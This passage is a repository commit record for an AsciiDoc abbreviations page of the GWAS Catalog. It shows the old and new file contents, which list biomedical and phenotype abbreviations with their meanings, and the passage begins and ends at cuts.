phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75\u00ad for latest exam\n\n\nppfefrat: percent predicted FEF25-75\u00ad\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FEC\/FEE: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n\npvRSA\/HF: peak-valley respiratory sinus arrhythmia or high frequency power\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRMSSD: root mean square of the successive differences of inter beat intervals\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nSBM: subset-based meta-analysis approach\n\n\nSDNN: standard deviation of the normal-to-normal inter beat intervals\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine\n\n\nSM-16: docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nSSRI: selective serotonin reuptake inhibitor\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nsTie-2: soluble receptor Tie-2\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTA: Tetra-antennary glycans\n\n\nTAT: Total adipose tissue area\n\n\nTBLH-BMD: total-body less head bone mineral density\n\n\nTB-LM: total-body lean mass\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWIT: word interference test\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HD\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","old_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>> ,<<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nAA: African ancestry\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACA: anti-centromere antibodies\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: ? fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alaine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALS: amyotrophic lateral sclerosis\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANC: Absolute neutrophil count\n\n\nANP6: N-terminal pro-atrial natriuretic peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nARC: AR-C124910XX\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATA: anti-topoisomerase antibodies\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n\nAUC: area under the curve\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBB:\tbeta blockers\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL:coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCB: calcium channel blockers\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCGI: Clinical Global Impressions-Severity\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatinine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farina\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEEG: electroencephalography\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nER +ve: Estrogen receptor positive\n\n\nER -ve: Estrogen receptor negative\n\n\nET-1: Endothelin-1\n\n\nET: endocrine treatment\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFSIGT: frequently sampled intravenous glucose tolerance test\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFTD: frontotemporal dementia\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGBA: glucocerebrosiadase\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamyl oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHAM-A: Hamilton Anxiety Scale\n\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHER2: human epidermal growth factor receptor 2\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model assessment of insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: homeostasis model assessment of beta-cell function\n\n\nHR: hormone receptor\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal cartotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor binding protein-3\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLp(a): lipoprotein (a)\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVEF: Left ventricular ejection fraction\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentra\u00adtion\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nMHBMA: 2-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene and 1-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenlglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: paragraph delayed recall\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nPD: Parkinson\u2019s disease\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75\u00ad for latest exam\n\n\nppfefrat: percent predicted FEF25-75\u00ad\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FEC\/FEE: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n\npvRSA\/HF: peak-valley respiratory sinus arrhythmia or high frequency power\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRMSSD: root mean square of the successive differences of inter beat intervals\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nSBM: subset-based meta-analysis approach\n\n\nSDNN: standard deviation of the normal-to-normal inter beat intervals\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine\n\n\nSM-16: docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nSSRI: selective serotonin reuptake inhibitor\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nsTie-2: soluble receptor Tie-2\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTAT: Total adipose tissue area\n\n\nTBLH-BMD: total-body less head bone mineral density\n\n\nTB-LM: total-body lean mass\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWIT: word interference test\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HD\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7525d99d2d5f991690c8423e0232e594c5953b72","subject":"Update abbreviations-content.adoc","message":"Update abbreviations-content.adoc","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>> ,<<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nAA: African-American\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: ? fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alaine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANP6: N-terminal pro-atrial natriuretic 